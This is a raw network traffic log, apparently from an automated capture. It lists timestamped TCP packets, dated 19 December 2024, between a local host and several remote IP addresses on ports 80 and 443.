                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.726196051 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.726267099 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.726280928 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.726313114 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.726330042 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.726351976 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.863801003 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.863883018 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.863953114 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.864022017 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.864069939 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.864069939 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.871299028 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.871366978 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.871401072 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.871423960 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.871454954 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.871476889 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.878818035 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.878870964 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.878921032 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.878935099 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.878974915 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.878998041 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.886420965 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.886466026 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.886512041 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.886524916 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.886553049 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.890180111 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.893595934 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.893641949 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.893686056 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.893709898 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.893758059 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.893759012 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.900041103 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.900063038 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.900114059 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.900137901 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.900161982 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.902175903 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.911468983 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.911510944 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.911556959 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.911569118 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.911611080 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.914175034 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.918129921 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.918150902 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.918247938 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.918262959 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.918309927 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.055788040 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.055852890 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.055917025 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.056000948 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.056049109 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.056049109 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.063306093 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.063373089 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.063402891 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.063417912 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.063446999 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.063466072 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.071140051 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.071186066 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.071230888 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.071243048 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.071273088 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.072917938 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.078537941 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.078586102 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.078608990 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.078622103 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.078649998 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.078670979 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.085558891 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.085606098 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.085639954 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.085664988 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.085689068 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.085707903 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.093087912 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.093242884 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.093256950 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.093286037 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.093316078 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.094156981 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.103147984 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.103173018 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.103230953 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.103247881 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.103281021 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.103368998 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.110232115 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.110251904 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.110299110 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.110311985 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.110341072 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.112565041 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.248776913 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.248832941 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.248950958 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.249000072 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.249033928 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.250066996 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.255379915 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.255425930 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.255717993 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.255750895 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.255820990 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.262849092 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.262897015 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.262934923 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.262948036 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.262970924 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.262991905 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.270395994 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.270489931 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.270517111 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.270525932 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.270560980 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.270576000 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.277210951 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.277256966 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.277318954 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.277345896 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.277376890 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.278443098 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.285237074 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.285280943 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.285319090 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.285336971 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.285367966 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.285387039 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.295500040 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.295545101 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.295614004 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.295627117 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.295655966 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.298158884 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.302330971 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.302351952 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.302429914 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.302443981 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.302500010 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.440610886 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.440656900 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.440713882 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.440726995 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.440756083 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.440773964 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447220087 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447263956 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447325945 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447340012 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447374105 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447484970 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447551966 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:58.447855949 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.038952112 CET4985480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.039211035 CET4988880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.158790112 CET8049888185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.158857107 CET8049854185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.158905029 CET4988880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.158916950 CET4985480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.159229040 CET4988880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.278759003 CET8049888185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.377458096 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.377510071 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.377564907 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.379096985 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.379112959 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.503082037 CET8049888185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.503454924 CET4988880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.506058931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.508740902 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.597470999 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.598028898 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.599366903 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.599376917 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.599771976 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.625813007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.625916004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.628217936 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.628503084 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.628504038 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.644836903 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.644836903 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.644963980 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.748044014 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.388590097 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.388688087 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.388756990 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.391207933 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.391207933 CET49889443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.391226053 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.391236067 CET44349889104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.401724100 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.401804924 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.401885986 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.412113905 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.412147999 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955661058 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955787897 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955812931 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955828905 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955884933 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955898046 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955914021 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955941916 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955976009 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955981016 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955996990 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956037045 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956037045 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956093073 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956131935 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956165075 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956221104 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956264019 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.075294971 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.075362921 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.075372934 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.075711966 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.079511881 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.079624891 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.149296999 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.149318933 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.149383068 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.152296066 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.152323961 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.152390003 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.160629034 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.160685062 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.160710096 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.160753012 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.168977976 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.169070005 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.169164896 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.177356958 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.177402973 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.177491903 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.177491903 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.186018944 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.186085939 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.186186075 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.186234951 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.194350004 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.194410086 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.194489956 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.194533110 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.202671051 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.202734947 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.202836037 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.203036070 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.211092949 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.211227894 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.211249113 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.211299896 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.219304085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.219360113 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.219382048 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.219429970 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.226891041 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.226947069 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.226995945 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.227045059 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.268953085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.269022942 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.269042015 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.269073963 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.340240955 CET804989231.41.244.11192.168.2.4
